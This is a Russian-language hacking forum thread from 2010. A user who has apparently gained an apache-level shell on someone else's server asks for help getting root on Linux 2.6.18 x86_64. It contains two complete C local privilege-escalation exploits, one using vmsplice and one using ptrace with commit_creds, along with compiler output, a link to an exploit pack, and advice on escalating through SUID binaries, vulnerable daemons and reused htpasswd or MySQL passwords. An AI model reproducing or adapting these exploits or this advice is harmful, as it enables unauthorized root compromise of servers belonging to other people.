Root Linux 2.6.18

LordNikon · 16 Sep 2010

Всем привет. Знаю тема затасканная, но вот ответ на такой вопрос нигде не нашел.
Имеется тачка:
uname -a
Linux srv.com 2.6.18-194.8.1.el5 #1 SMP Thu Jul 1 19:04:48 EDT 2010 x86_64 x86_64 x86_64 GNU/Linux
id
uid=101(apache) gid=500(apache) groups=500(apache)

Попробовал такой сплойт:

Code:

=================================
2.6.18-20 2009 Local Root Exploit
=================================



# Title: 2.6.18-20 2009 Local Root Exploit
# CVE-ID: ()
# OSVDB-ID: ()
# Author: DigitALL
# Published: 2009-12-23
# Verified: no

view source
print?
# Author: DigitALL
# Version: 2.6.18-20
# Tested on: Linux System
# Greetz To: Zombie KroNicKq and All 1923turk.Biz Members
# Code : 2.6.18 2008 Exploit's İs Edited 2009 Version.I Am Tested 2.6.18-20 2009 Linux is Rooted.Coming Soon.By DigitALL
 
#define _GNU_SOURCE
#include <stdio.h>
#include <errno.h>
#include <stdlib.h>
#include <string.h>
#include <malloc.h>
#include <limits.h>
#include <signal.h>
#include <unistd.h>
#include <sys/uio.h>
#include <sys/mman.h>
#include <asm/page.h>
#define __KERNEL__
#include <asm/unistd.h>
 
#define PIPE_BUFFERS    16
#define PG_compound    14
#define uint        unsigned int
#define static_inline    static inline __attribute__((always_inline))
#define STACK(x)    (x + sizeof(x) - 40)
 
struct page {
    unsigned long flags;
    int count;
    int mapcount;
    unsigned long private;
    void *mapping;
    unsigned long index;
    struct { long next, prev; } lru;
};
 
void    exit_code();
char    exit_stack[1024 * 1024];
 
void    die(char *msg, int err)
{
    printf(err ? "[-] %s: %s\n" : "[-] %s\n", msg, strerror(err));
    fflush(stdout);
    fflush(stderr);
    exit(1);
}
 
#if defined (__i386__)
 
#ifndef __NR_vmsplice
#define __NR_vmsplice    316
#endif
 
#define USER_CS        0x73
#define USER_SS        0x7b
#define USER_FL        0x246
 
static_inline
void    exit_kernel()
{
    __asm__ __volatile__ (
    "movl %0, 0x10(%%esp) ;"
    "movl %1, 0x0c(%%esp) ;"
    "movl %2, 0x08(%%esp) ;"
    "movl %3, 0x04(%%esp) ;"
    "movl %4, 0x00(%%esp) ;"
    "iret"
    : : "i" (USER_SS), "r" (STACK(exit_stack)), "i" (USER_FL),
        "i" (USER_CS), "r" (exit_code)
    );
}
 
static_inline
void *    get_current()
{
    unsigned long curr;
    __asm__ __volatile__ (
    "movl %%esp, %%eax ;"
    "andl %1, %%eax ;"
    "movl (%%eax), %0"
    : "=r" (curr)
    : "i" (~8191)
    );
    return (void *) curr;
}
 
#elif defined (__x86_64__)
 
#ifndef __NR_vmsplice
#define __NR_vmsplice    278
#endif
 
#define USER_CS        0x23
#define USER_SS        0x2b
#define USER_FL        0x246
 
static_inline
void    exit_kernel()
{
    __asm__ __volatile__ (
    "swapgs ;"
    "movq %0, 0x20(%%rsp) ;"
    "movq %1, 0x18(%%rsp) ;"
    "movq %2, 0x10(%%rsp) ;"
    "movq %3, 0x08(%%rsp) ;"
    "movq %4, 0x00(%%rsp) ;"
    "iretq"
    : : "i" (USER_SS), "r" (STACK(exit_stack)), "i" (USER_FL),
        "i" (USER_CS), "r" (exit_code)
    );
}
 
static_inline
void *    get_current()
{
    unsigned long curr;
    __asm__ __volatile__ (
    "movq %%gs:(0), %0"
    : "=r" (curr)
    );
    return (void *) curr;
}
 
#else
#error "unsupported arch"
#endif
 
#if defined (_syscall4)
#define __NR__vmsplice    __NR_vmsplice
_syscall4(
    long, _vmsplice,
    int, fd,
    struct iovec *, iov,
    unsigned long, nr_segs,
    unsigned int, flags)
 
#else
#define _vmsplice(fd,io,nr,fl)    syscall(__NR_vmsplice, (fd), (io), (nr), (fl))
#endif
 
static uint uid, gid;
 
void    kernel_code()
{
    int    i;
    uint    *p = get_current();
 
    for (i = 0; i < 1024-13; i++) {
        if (p[0] == uid && p[1] == uid &&
            p[2] == uid && p[3] == uid &&
            p[4] == gid && p[5] == gid &&
            p[6] == gid && p[7] == gid) {
            p[0] = p[1] = p[2] = p[3] = 0;
            p[4] = p[5] = p[6] = p[7] = 0;
            p = (uint *) ((char *)(p + 8) + sizeof(void *));
            p[0] = p[1] = p[2] = ~0;
            break;
        }
        p++;
    }
 
    exit_kernel();
}
 
void    exit_code()
{
    if (getuid() != 0)
        die("wtf", 0);
 
    printf("[+] root\n");
    putenv("HISTFILE=/dev/null");
    execl("/bin/bash", "bash", "-i", NULL);
    die("/bin/bash", errno);
}
 
int    main(int argc, char *argv[])
{
    int        pi[2];
    size_t        map_size;
    char *        map_addr;
    struct iovec    iov;
    struct page *    pages[5];
 
    uid = getuid();
    gid = getgid();
    setresuid(uid, uid, uid);
    setresgid(gid, gid, gid);
 
    printf("-----------------------------------\n");
    printf(" Linux 2.6.18-20 2009 Local Root Exploit\n");
    printf(" By DigitALL\n");
    printf("-----------------------------------\n");
 
    if (!uid || !gid)
        die("!@#$", 0);
 
    /*****/
    pages[0] = *(void **) &(int[2]){0,PAGE_SIZE};
    pages[1] = pages[0] + 1;
 
    map_size = PAGE_SIZE;
    map_addr = mmap(pages[0], map_size, PROT_READ | PROT_WRITE,
                    MAP_FIXED | MAP_PRIVATE | MAP_ANONYMOUS, -1, 0);
    if (map_addr == MAP_FAILED)
        die("mmap", errno);
 
    memset(map_addr, 0, map_size);
    printf("[+] mmap: 0x%lx .. 0x%lx\n", map_addr, map_addr + map_size);
    printf("[+] page: 0x%lx\n", pages[0]);
    printf("[+] page: 0x%lx\n", pages[1]);
 
    pages[0]->flags    = 1 << PG_compound;
    pages[0]->private  = (unsigned long) pages[0];
    pages[0]->count    = 1;
    pages[1]->lru.next = (long) kernel_code;
 
    /*****/
    pages[2] = *(void **) pages[0];
    pages[3] = pages[2] + 1;
 
    map_size = PAGE_SIZE;
    map_addr = mmap(pages[2], map_size, PROT_READ | PROT_WRITE,
                    MAP_FIXED | MAP_PRIVATE | MAP_ANONYMOUS, -1, 0);
    if (map_addr == MAP_FAILED)
        die("mmap", errno);
 
    memset(map_addr, 0, map_size);
    printf("[+] mmap: 0x%lx .. 0x%lx\n", map_addr, map_addr + map_size);
    printf("[+] page: 0x%lx\n", pages[2]);
    printf("[+] page: 0x%lx\n", pages[3]);
 
    pages[2]->flags    = 1 << PG_compound;
    pages[2]->private  = (unsigned long) pages[2];
    pages[2]->count    = 1;
    pages[3]->lru.next = (long) kernel_code;
 
    /*****/
    pages[4] = *(void **) &(int[2]){PAGE_SIZE,0};
    map_size = PAGE_SIZE;
    map_addr = mmap(pages[4], map_size, PROT_READ | PROT_WRITE,
                    MAP_FIXED | MAP_PRIVATE | MAP_ANONYMOUS, -1, 0);
    if (map_addr == MAP_FAILED)
        die("mmap", errno);
    memset(map_addr, 0, map_size);
    printf("[+] mmap: 0x%lx .. 0x%lx\n", map_addr, map_addr + map_size);
    printf("[+] page: 0x%lx\n", pages[4]);
 
    /*****/
    map_size = (PIPE_BUFFERS * 3 + 2) * PAGE_SIZE;
    map_addr = mmap(NULL, map_size, PROT_READ | PROT_WRITE,
                    MAP_PRIVATE | MAP_ANONYMOUS, -1, 0);
    if (map_addr == MAP_FAILED)
        die("mmap", errno);
 
    memset(map_addr, 0, map_size);
    printf("[+] mmap: 0x%lx .. 0x%lx\n", map_addr, map_addr + map_size);
 
    /*****/
    map_size -= 2 * PAGE_SIZE;
    if (munmap(map_addr + map_size, PAGE_SIZE) < 0)
        die("munmap", errno);
 
    /*****/
    if (pipe(pi) < 0) die("pipe", errno);
    close(pi[0]);
 
    iov.iov_base = map_addr;
    iov.iov_len  = ULONG_MAX;
 
    signal(SIGPIPE, exit_code);
    _vmsplice(pi[1], &iov, 1, 0);
    die("vmsplice", errno);
    return 0;
}


# Inj3ct0r.com [2009-12-23]

Думаю ща скомпилю и дело в шляпе, но не тут то было.
gcc -o p p.c

выдал мне ошибку:

Code:


	/usr/include/stdlib.h:864: error: expected declaration specifiers or '...' before 'size_t'                              /usr/include/stdlib.h:873: error: expected declaration specifiers or '...' before 'size_t'                                        /usr/include/stdlib.h:877: error: expected declaration specifiers or '...' before 'size_t'                                                  /usr/include/stdlib.h:884: error: expected '=', ',', ';', 'asm' or '__attribute__' before 'mbstowcs'                                                                      /usr/include/stdlib.h:887: error: expected '=', ',', ';', 'asm' or '__attribute__' before 'wcstombs'          /usr/include/stdlib.h:950: error: expected declaration specifiers or '...' before 'size_t'                    In file included from p.c:26:                                                 /usr/include/string.h:39: error: expected declaration specifiers or '...' before 'size_t'                                                          /usr/include/string.h:43: error: expected declaration specifiers or '...' before 'size_t'                                                                   /usr/include/string.h:52: error: expected declaration specifiers or '...' before 'size_t'                                                                            /usr/include/string.h:59: error: expected declaration specifiers or '...' before 'size_t'     /usr/include/string.h:62: error: expected declaration specifiers or '...' before 'size_t'              /usr/include/string.h:66: error: expected declaration specifiers or '...' before 'size_t'                       /usr/include/string.h:77: error: expected declaration specifiers or '...' before 'size_t'                                /usr/include/string.h:88: error: expected declaration specifiers or '...' before 'size_t'                                         /usr/include/string.h:96: error: expected declaration specifiers or '...' before 'size_t'                                                  /usr/include/string.h:102: error: expected declaration specifiers or '...' before 'size_t'                                                            /usr/include/string.h:109: error: expected '=', ',', ';', 'asm' or '__attribute__' before 'strxfrm'                                                                               /usr/include/string.h:124: error: expected '=', ',', ';', 'asm' or '__attribute__' before 'strxfrm_l'                    /usr/include/string.h:138: error: expected declaration specifiers or '...' before 'size_t'                              /usr/include/string.h:184: error: expected '=', ',', ';', 'asm' or '__attribute__' before 'strcspn'                                                 /usr/include/string.h:188: error: expected '=', ',', ';', 'asm' or '__attribute__' before 'strspn'                                                                   /usr/include/string.h:225: error: expected declaration specifiers or '...' before 'size_t'                                                                             /usr/include/string.h:226: error: expected declaration specifiers or '...' before 'size_t'       /usr/include/string.h:227: error: nonnull argument with out-of-range operand number (argument 1, operand 3)                                  /usr/include/string.h:232: error: expected declaration specifiers or '...' before 'size_t'                                            /usr/include/string.h:235: error: expected declaration specifiers or '...' before 'size_t'                                                      /usr/include/string.h:242: error: expected '=', ',', ';', 'asm' or '__attribute__' before 'strlen'                                                                        /usr/include/string.h:249: error: expected '=', ',', ';', 'asm' or '__attribute__' before 'strnlen'           /usr/include/string.h:281: error: expected declaration specifiers or '...' before 'size_t'                     /usr/include/string.h:288: error: expected declaration specifiers or '...' before 'size_t'                               /usr/include/string.h:292: error: expected declaration specifiers or '...' before 'size_t'                                         /usr/include/string.h:296: error: expected declaration specifiers or '...' before 'size_t'                                                   /usr/include/string.h:299: error: expected declaration specifiers or '...' before 'size_t'                                                             /usr/include/string.h:329: error: expected declaration specifiers or '...' before 'size_t'                                                                       /usr/include/string.h:341: error: expected declaration specifiers or '...' before 'size_t'                                                                                 /usr/include/string.h:342: error: nonnull argument with out-of-range operand number (argument 1, operand 4)                            /usr/include/string.h:370: error: expected declaration specifiers or '...' before 'size_t'                                      /usr/include/string.h:373: error: expected declaration specifiers or '...' before 'size_t'                                                /usr/include/string.h:380: error: expected declaration specifiers or '...' before 'size_t'                                                          In file included from p.c:27:       /usr/include/malloc.h:49: error: expected ')' before '__size'                                                                    /usr/include/malloc.h:52: error: expected ')' before '__nmemb'                                                  /usr/include/malloc.h:57: error: expected declaration specifiers or '...' before 'size_t'                                                           /usr/include/malloc.h:67: error: expected ')' before '__alignment'                                             /usr/include/malloc.h:71: error: expected ')' before '__size'                          /usr/include/malloc.h:76: error: expected ')' before '__size'       /usr/include/malloc.h:134: error: expected ')' before '__pad'                                                                    /usr/include/malloc.h:138: error: expected '=', ',', ';', 'asm' or '__attribute__' before 'malloc_usable_size'                  /usr/include/malloc.h:157: error: expected ')' before '__size'                                                                                /usr/include/malloc.h:159: error: expected declaration specifiers or '...' before 'size_t'          /usr/include/malloc.h:161: error: expected ')' before '__alignment'                                                                             In file included from /usr/include/signal.h:348,                                                              from p.c:29:                                                                          /usr/include/bits/sigstack.h:54: error: expected specifier-qualifier-list before 'size_t'   In file included from p.c:30:                                /usr/include/unistd.h:327: error: expected declaration specifiers or '...' before 'size_t'                                          /usr/include/unistd.h:333: error: expected declaration specifiers or '...' before 'size_t'                                                    /usr/include/unistd.h:343: error: expected declaration specifiers or '...' before 'size_t'                                                              /usr/include/unistd.h:351: error: expected declaration specifiers or '...' before 'size_t'                                                                        /usr/include/unistd.h:371: error: expected declaration specifiers or '...' before 'size_t'                                                                                 /usr/include/unistd.h:375: error: expected declaration specifiers or '...' before 'size_t'           /usr/include/unistd.h:471: error: expected declaration specifiers or '...' before 'size_t'                     In file included from p.c:30:                                                  /usr/include/unistd.h:568: error: expected '=', ',', ';', 'asm' or '__attribute__' before 'confstr'                                                                     /usr/include/unistd.h:740: error: expected declaration specifiers or '...' before 'size_t'                                                                               /usr/include/unistd.h:776: error: expected declaration specifiers or '...' before 'size_t'         /usr/include/unistd.h:787: error: expected declaration specifiers or '...' before 'size_t'                   /usr/include/unistd.h:823: error: expected declaration specifiers or '...' before 'size_t'                             In file included from p.c:30:                                                          /usr/include/unistd.h:845: error: expected declaration specifiers or '...' before 'size_t'                                                                    /usr/include/unistd.h:852: error: expected declaration specifiers or '...' before 'size_t'                                                                              /usr/include/unistd.h:863: error: expected declaration specifiers or '...' before 'size_t'        /usr/include/unistd.h:865: error: expected declaration specifiers or '...' before 'size_t'                  /usr/include/unistd.h:883: error: expected declaration specifiers or '...' before 'size_t'                            /usr/include/unistd.h:884: error: expected declaration specifiers or '...' before 'size_t'                                      In file included from /usr/include/sys/uio.h:29,                       from p.c:31:                                   /usr/include/bits/uio.h:47: error: expected specifier-qualifier-list before 'size_t'                                       In file included from p.c:32:                                                                    /usr/include/sys/mman.h:58: error: expected declaration specifiers or '...' before 'size_t'                                                                               /usr/include/sys/mman.h:71: error: expected declaration specifiers or '...' before 'size_t'          /usr/include/sys/mman.h:77: error: expected declaration specifiers or '...' before 'size_t'                     /usr/include/sys/mman.h:82: error: expected declaration specifiers or '...' before 'size_t'                                /usr/include/sys/mman.h:90: error: expected declaration specifiers or '...' before 'size_t'                                           /usr/include/sys/mman.h:95: error: expected declaration specifiers or '...' before 'size_t'                                                      /usr/include/sys/mman.h:99: error: expected declaration specifiers or '...' before 'size_t'                                                                 /usr/include/sys/mman.h:104: error: expected declaration specifiers or '...' before 'size_t'                                                                             /usr/include/sys/mman.h:107: error: expected declaration specifiers or '...' before 'size_t'         /usr/include/sys/mman.h:124: error: expected declaration specifiers or '...' before 'size_t'                     /usr/include/sys/mman.h:134: error: expected declaration specifiers or '...' before 'size_t'                                 /usr/include/sys/mman.h:134: error: expected declaration specifiers or '...' before 'size_t'                                             /usr/include/sys/mman.h:139: error: expected declaration specifiers or '...' before 'size_t'                                                         /usr/include/sys/mman.h:140: error: expected declaration specifiers or '...' before 'size_t'                                                                     p.c: In function 'main':             p.c:195: error: 'size_t' undeclared (first use in this function)                                                                             p.c:195: error: (Each undeclared identifier is reported only once                                                              p.c:195: error: for each function it appears in.)                               p.c:195: error: expected ';' before 'map_size'                                                                             p.c:214: error: 'PAGE_SIZE' undeclared (first use in this function)                                                                p.c:217: error: 'map_size' undeclared (first use in this function)                                                  p.c:219: error: too many arguments to function 'mmap'                       p.c:223: error: too many arguments to function 'memset'                                                                              p.c:239: error: too many arguments to function 'mmap'                                                   p.c:243: error: too many arguments to function 'memset'                          p.c:257: error: too many arguments to function 'mmap'                                                                               p.c:260: error: too many arguments to function 'memset'                                                      p.c:267: error: too many arguments to function 'mmap'                           p.c:271: error: too many arguments to function 'memset'                                                                                 p.c:276: error: too many arguments to function 'munmap'                                                        p.c:284: error: 'struct iovec' has no member named 'iov_len'                                    p.c:293:3: error: invalid preprocessing directive #Inj3ct0r               p.c:293:28: warning: no newline at end of file

Вобщем, я так понял что что то не так с компилом на х64. Подскажите как быть, уж очень хочется порутать)

<Cyber-punk> · 16 Sep 2010

Попробуй этот сплойт-пак - http://bit.ly/c4y4Go

kfor · 16 Sep 2010

Он не сработает. попробуй этот и о результатах отпиши плиз. Типа свежий сплойтик

Code:

#include <sys/types.h> 
#include <sys/wait.h> 
#include <sys/ptrace.h> 
#include <inttypes.h> 
#include <sys/reg.h> 
#include <unistd.h> 
#include <stdio.h> 
#include <stdlib.h> 
#include <sys/mman.h> 
#include <string.h> 
  
typedef int __attribute__((regparm(3))) (* _commit_creds)(unsigned long cred); 
typedef unsigned long __attribute__((regparm(3))) (* _prepare_kernel_cred)(unsigned long cred); 
_commit_creds commit_creds; 
_prepare_kernel_cred prepare_kernel_cred; 
  
int kernelmodecode(void *file, void *vma) 
{ 
    commit_creds(prepare_kernel_cred(0)); 
    return -1; 
} 
  
unsigned long
get_symbol(char *name) 
{ 
    FILE *f; 
    unsigned long addr; 
    char dummy; 
    char sname[512]; 
    int ret = 0, oldstyle = 0; 
  
    f = fopen("/proc/kallsyms", "r"); 
    if (f == NULL) { 
        f = fopen("/proc/ksyms", "r"); 
        if (f == NULL) 
            return 0; 
        oldstyle = 1; 
    } 
  
    while (ret != EOF) { 
        if (!oldstyle) { 
            ret = fscanf(f, "%p %c %s\n", (void **) &addr, &dummy, sname); 
        } else { 
            ret = fscanf(f, "%p %s\n", (void **) &addr, sname); 
            if (ret == 2) { 
                char *p; 
                if (strstr(sname, "_O/") || strstr(sname, "_S.")) { 
                    continue; 
                } 
                p = strrchr(sname, '_'); 
                if (p > ((char *) sname + 5) && !strncmp(p - 3, "smp", 3)) { 
                    p = p - 4; 
                    while (p > (char *)sname && *(p - 1) == '_') { 
                        p--; 
                    } 
                    *p = '\0'; 
                } 
            } 
        } 
        if (ret == 0) { 
            fscanf(f, "%s\n", sname); 
            continue; 
        } 
        if (!strcmp(name, sname)) { 
            printf("resolved symbol %s to %p\n", name, (void *) addr); 
            fclose(f); 
            return addr; 
        } 
    } 
    fclose(f); 
  
    return 0; 
} 
  
   
static void docall(uint64_t *ptr, uint64_t size) 
{ 
    commit_creds = (_commit_creds) get_symbol("commit_creds"); 
    if (!commit_creds) { 
        printf("symbol table not available, aborting!\n"); 
        exit(1); 
    } 
  
    prepare_kernel_cred = (_prepare_kernel_cred) get_symbol("prepare_kernel_cred"); 
    if (!prepare_kernel_cred) { 
        printf("symbol table not available, aborting!\n"); 
        exit(1); 
    } 
  
        uint64_t tmp = ((uint64_t)ptr & ~0x00000000000FFF); 
  
    printf("mapping at %lx\n", tmp);  
  
        if (mmap((void*)tmp, size, PROT_READ|PROT_WRITE|PROT_EXEC, 
                MAP_PRIVATE|MAP_FIXED|MAP_ANONYMOUS, -1, 0) == MAP_FAILED) { 
                printf("mmap fault\n"); 
                exit(1); 
        } 
   
        for (; (uint64_t) ptr < (tmp + size); ptr++) 
                *ptr = (uint64_t)kernelmodecode; 
   
        __asm__("\n"
        "\tmovq $0x101, %rax\n"
        "\tint $0x80\n"); 
   
        printf("UID %d, EUID:%d GID:%d, EGID:%d\n", getuid(), geteuid(), getgid(), getegid()); 
        execl("/bin/sh", "bin/sh", NULL); 
        printf("no /bin/sh ??\n"); 
        exit(0); 
} 
   
int main(int argc, char **argv) 
{ 
        int pid, status, set = 0; 
        uint64_t rax; 
        uint64_t kern_s = 0xffffffff80000000; 
        uint64_t kern_e = 0xffffffff84000000; 
        uint64_t off = 0x0000000800000101 * 8; 
   
        if (argc == 4) { 
                docall((uint64_t*)(kern_s + off), kern_e - kern_s); 
                exit(0); 
        } 
   
        if ((pid = fork()) == 0) { 
                ptrace(PTRACE_TRACEME, 0, 0, 0); 
                execl(argv[0], argv[0], "2", "3", "4", NULL); 
                perror("exec fault"); 
                exit(1); 
        } 
   
        if (pid == -1) { 
                printf("fork fault\n"); 
                exit(1); 
        } 
   
        for (;;) { 
                if (wait(&status) != pid) 
                        continue; 
   
                if (WIFEXITED(status)) { 
                        printf("Process finished\n"); 
                        break; 
                } 
   
                if (!WIFSTOPPED(status)) 
                        continue; 
   
                if (WSTOPSIG(status) != SIGTRAP) { 
                        printf("Process received signal: %d\n", WSTOPSIG(status)); 
                        break; 
                } 
   
                rax = ptrace(PTRACE_PEEKUSER, pid, 8*ORIG_RAX, 0); 
                if (rax == 0x000000000101) { 
                        if (ptrace(PTRACE_POKEUSER, pid, 8*ORIG_RAX, off/8) == -1) { 
                                printf("PTRACE_POKEUSER fault\n"); 
                                exit(1); 
                        } 
                        set = 1; 
                    //rax = ptrace(PTRACE_PEEKUSER, pid, 8*ORIG_RAX, 0); 
                } 
   
                if ((rax == 11) && set) { 
                        ptrace(PTRACE_DETACH, pid, 0, 0); 
                        for(;;) 
                                sleep(10000); 
                } 
   
                if (ptrace(PTRACE_SYSCALL, pid, 1, 0) == -1) { 
                        printf("PTRACE_SYSCALL fault\n"); 
                        exit(1); 
                } 
        } 
   
        return 0; 
}

LordNikon · 16 Sep 2010

kfor said:

Он не сработает. попробуй этот и о результатах отпиши плиз. Типа свежий сплойтик
Click to expand...

ЗАлил, скомпилил:
gcc -o p ex.c
./p
symbol table not available, aborting!
Process finished

LordNikon · 16 Sep 2010

<Cyber-punk> said:

Попробуй этот сплойт-пак - http://bit.ly/c4y4Go
Click to expand...

Херня какая то, SlaxModulator... Или я тебя не понял(

LordNikon · 17 Sep 2010

Идеи закончились?)

Lestatkiy · 10 Dec 2010

*Второй день* ето сказки аля ксакеп, которым даже жопу нельзя вытереть, у норм людей до забития на шелл уходит 15 мин макс.

SEWERN · 10 Dec 2010

Lestatkiy said:

*Второй день* ето сказки аля ксакеп, которым даже жопу нельзя вытереть, у норм людей до забития на шелл уходит 15 мин макс.
Click to expand...

бывает что на сервере есть нужная инфа , так что приходится искать сплойт))

Le Fruit · 14 Dec 2010

актуального рабочего эксплойта под данную версию, учитывая дату обновления ядра, нет, попробуйте повысить привелегии через суидные файлы, или уязвимые демоны, также можно поискать какие-либо еще пароли в системах htpasswd/mysql/etc. и попробовать их на ssh.

Root Linux 2.6.18

LordNikon New Member

<Cyber-punk> Smash the Stack

kfor Elder - Старейшина

LordNikon New Member

LordNikon New Member

LordNikon New Member

Lestatkiy Member

SEWERN Elder - Старейшина

Le Fruit New Member

Подскажите шелл на PHP8, Linux 4

Ставим Linux по соседству с Android

Useful Searches

Root Linux 2.6.18

LordNikon New Member

<Cyber-punk> Smash the Stack

kfor Elder - Старейшина

LordNikon New Member

LordNikon New Member

LordNikon New Member

Lestatkiy Member

SEWERN Elder - Старейшина

Le Fruit New Member

Подскажите шелл на PHP8, Linux 4

Ставим Linux по соседству с Android